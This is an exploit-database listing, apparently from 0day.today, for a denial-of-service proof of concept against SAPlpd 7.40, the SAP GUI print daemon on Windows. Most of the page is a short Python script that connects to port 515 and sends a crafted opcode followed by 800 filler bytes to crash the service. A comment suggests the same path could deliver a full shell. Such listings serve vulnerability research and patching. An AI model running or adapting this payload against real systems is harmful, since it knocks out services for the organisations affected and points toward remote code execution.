[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SapLPD 7.40 - Denial of Service Exploit

Author
Peter Baris
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-26658
Category
dos / poc
Date add
12-01-2017
Platform
windows
# Exploit Title: SAPlpd 7.40 Denial of Service
# Date: 2016-12-28
# Exploit Author: Peter Baris
# Exploit code: http://saptech-erp.com.au/resources/saplpd_dos.zip
# Version: 7.40 all patch levels (as a part of SAPGui 7.40)  
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64
 
 
import socket
 
# Opcodes 03h and 04h are vulnerable to bad characters 00h and 0ah
# So you can modify the DoS accordingly
# The added 800 A's are just to show, that you can deliver a complete shell with the command
 
DoS = ("\x03"+"\x0a"+"\x41"*800)
 
 
s = socket.socket()
s.settimeout(1)
s.connect(('192.168.198.132', 515))
print("[*] Crashing SAPlpd 7.40")
print("[*] Payload length: "+str(len(DoS))+" bytes")
s.send(DoS)
s.close()

#  0day.today [2024-12-24]  #